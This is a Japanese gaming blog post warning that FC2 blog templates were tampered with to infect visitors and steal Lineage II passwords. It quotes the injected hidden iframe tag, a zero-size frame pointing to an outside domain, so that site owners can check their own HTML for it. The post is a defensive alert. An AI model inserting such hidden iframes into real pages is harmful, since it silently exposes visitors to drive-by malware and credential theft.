Lineage Ⅱ (リネージュ2) 私的覚書

リネージュⅡ・リオナ鯖での活動日記や、オンラインゲームの徒然など☆


--.--.-- --:-- | スポンサー広告 | トラックバック(-) | コメント(-) |
FC2ブログのテンプレート改ざん事件が勃発!!
しかもですね・・・。
管理人以外の第三者に改ざんされた!

とかΣ(`д´♯)!? ありえません・・・怖すぎるhhh
さらに、コレにはオマケがついていて、どうやら

「リネージュⅡ」パス抜き狙い

らしいのです・・・。
どういった経緯で起こるかと言うと。。。

FC2ブログのテンプレートが外部から改ざんされ、
そのブログにアクセスしたユーザーがウイルスに感染。
パス抜きをされ、アカハックされてしまう可能性があるとの事。

  ■詳細は、コチラのブログで。 ⇒ FC2ブログの歩き方。

FC2ブログ使っている私には、コレはただ事では無い!!
大至急テンプレートを調べてみたところ、それらしきモノは無かったのでホッ。
とりあえず良かったけど、これからもそういう危険はあるので油断禁物。
これからも、テンプレートの調査はやろうと思います。

今回はたまたまFC2ブログが攻撃の矛先になったようですが、
「FC2ブログだけが狙われている」という認識は危険です。

<iframe>というタグをテンプレート内に埋め込むことができる、
自由度の高いブログサービスやレンタルサーバ・自宅サーバの
ブログが狙われているそうですから、誰にでもその危険はあるんですよね。

サイト管理者の方は、テンプレートが書き換えられていないか
チェックしてみたほうがいいかもしれませんね。(特にFC2ブログの方は!)

改ざんさせられたブログ、ホームページのHTML内には、
<iframe src="http://www.dda3.net" width="0" height="0"></iframe>
というインラインフレームタグ入るそうのなので、iframeなどの言葉で
HTMLのチェックをしてみることをおすすめします。

ちなみに、インラインフレームというのは、こういうヤツ↓



よく見掛けますよね、コレ。
別のHTML文書等を、インラインで埋め込んで表示するもの。
「別のwebサイトを読み込ませて表示」・・・ココがクセモノ。

更に、width="数値" height="数値"と言うタグで、
フレームの横幅と縦幅を指定できます。
上記の悪質サイトは、width="0" height="0"と設定しているので
サイトを開いても、一見何も表示されていないように見えるハズ。

管理画面に入り込まれて、テンプレいじられてコレされると、
ページにアクセスしただけで感染してしまうんですよね('-';A

ためしに、上のリネのページのタグの縦幅と横幅の部分に
「5」という数値を入れてみました。

   ←コレです(汗 見えますか?

「5」でこれだけ小さいのですから、「0」ではモチロン見えないでしょう。
何も表示されてないのに、実はどこぞの怪しいURLをクリックしたのと同じ。
・・・なんという恐ろしい;;
こういうヤツが、最近多い、怪しいコメントのURLなどにも仕込まれていそう。

とりあえず・・・アンチウイルスソフトは絶対入れましょう^^;
まぁ、このご時世、オンラインゲームやっていて入れてない、
なんて暢気な人はそう居ないとは思いますが。。。

何よりも、見過ごしていると、サイトを見に来てくれた方にも
感染させてしまう危険があるのがもぅ、何ともね・・・('-';A
自分の為だけではなく、他の人の迷惑にもなるので、入れませう。

あと、リネ2やっている方は、パスワードの変更と
セキリュティカードの再発行も、定期的にしておきたいトコロです。

  ■リネージュⅡ公式 ⇒ 弊社サービスを対象としたウイルスにご注意下さい

この記事を書いてすぐに、
ココに怪しいコメントが!!@@;

業者必死すぎ。
もう、ホント迷惑だ。

2008.03.14 04:53 URL | リン #- [ 編集 ]

>とらとらさんへ。

とらさんへの返事をフツーに書いてただけなのに
何かのバグなのか、コメントが消えてる・・・!?

なんでだろ;; せっかくコメント頂いたのに><。
申し訳ありません(*- -)(*_ _)

そして、ココにもよくH系のコメント付きます。
とらさんちもつくのねぇ><。
なぜかゲーム系のブログにいっぱいついてるから、
アレもパス抜かれる可能性が大ですねorz。

2008.03.15 01:54 URL | リン #- [ 編集 ]













管理者にだけ表示

トラックバックURL↓
http://rin1215.blog41.fc2.com/tb.php/658-b140fbf1

